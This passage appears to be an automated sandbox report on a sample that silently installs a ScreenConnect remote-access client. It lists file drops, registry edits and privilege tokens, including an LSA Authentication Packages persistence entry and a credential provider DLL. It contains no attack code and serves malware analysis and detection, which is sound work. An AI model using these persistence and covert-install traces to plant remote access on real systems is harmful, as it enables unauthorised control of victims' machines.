| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a1.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7829a1.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7829a0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2EDE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI33B1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2D76.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7829a3.msi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
